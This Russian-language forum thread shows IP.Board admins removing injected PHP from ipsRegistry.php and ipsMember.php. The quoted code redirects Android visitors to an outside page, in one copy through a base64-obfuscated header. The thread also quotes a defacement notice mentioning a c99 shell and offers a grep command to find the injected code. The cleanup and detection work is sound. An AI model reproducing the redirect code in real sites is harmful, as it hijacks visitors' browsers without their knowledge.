Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...

Recommended Posts

Нашел ))

В файле admin/sources/base/ipsRegistry.php

 

нашел в самом низу и удалил код:

 

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

Share this post


Link to post
Share on other sites

Вот такие веселые коды прописались в ipsMember.php при удалении выскакивает ошибка форума ***/sources/base/ipsMember.php on line 3852, будем дальше искать

 

}

$mbrowser = function_exists("mobile_device_detect") ? mobile_device_detect() : false;

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header(base64_decode("TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s"));

exit;

}

 

и в ipsRegistry.php - этот код снес

 

}

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

 

 

Если расшифровать вот это через base64 декодер TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s

получаем - Location: http://www.kirkdavidson.com/js/fp.html

 

Вот так ))

Share this post


Link to post
Share on other sites

Зашел на один, а там:

Hackers had target адресфорума.net , They were using a 0-day exploit.

 

They were able to exploit the file public_html/hooks/boardIndexRecentTopics_540cbccd3003d5413b759ef888b45a23.php and replace it with a c99 shell.

 

Please do disable that plugin on all your IP.Boards.

 

:: Issued in public interest by ServerPolice Inc. htttp://serverpolice.org ::

 

 

PS : We'll be back soon ;)

 

Версия форум у них была, мне кажется, 3.4.2

Share this post


Link to post
Share on other sites

Друзья, подскажите как вычистить остальное )) из ipsMember.php не могу удалить выскакивает ошибка

Share this post


Link to post
Share on other sites

Какая ошибка?

В остальных файлов искали?

Шеллы удалили?

ssh на хостинге есть?

  • Upvote 1

Share this post


Link to post
Share on other sites

SSH есть. По поиску не искал, нашел только в соседнем файле sRegistry.php - и почистил вручную он там немного подругому был записал выше есть все коды которые там прописаны.

Как проверить на шеллы ? хочу поставить ХАнтера что то не ставится пока(

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Ранее был вирус тот что из 128 картинки все что мог вроде почистил.

Патчи безопасности стоят

Edited by Ultima

Share this post


Link to post
Share on other sites
SSH есть.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Что-то лишнее удалили. Файл прикрепите.

 

Патчи безопасности стоят

Кроме патчей, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до патча.

  • Upvote 1

Share this post


Link to post
Share on other sites

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

 

Что-то лишнее удалили. Файл прикрепите.

 

 

Кроме патчи, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до их установке.

 

А как почистить изменения и левый файлы ?

Файлы не могу залить давай на почту скину ?

Использовано 0байт из разрешенных вам 50К для загрузки файлов (максимальный размер файла: 50К)

 

 

Вот вся папка https://www.dropbox.com/s/7f7er9o703gh5f3/base.rar

 

 

Пишет The -P option is not supported

Share this post


Link to post
Share on other sites
А как почистить изменения и левый файлы ?

Вручную, либо из бэкапа. Но если из бэкапа, прежде чем их заливать желательно проверить.

  • Upvote 1

Share this post


Link to post
Share on other sites

ipsMember.php и ipsRegistry.php

  • Upvote 1

Share this post


Link to post
Share on other sites

ipsMember.php и ipsRegistry.php

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

 

Вручную, либо из бэкапа. Но если из бэкапа желательно прежде чем их заливать - проверить.

бэкапа к сожалению нет :) Если и есть то наверное старый.

Share this post


Link to post
Share on other sites

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Share this post


Link to post
Share on other sites

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Соверженно верно этот же код ?

Share this post


Link to post
Share on other sites

@Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...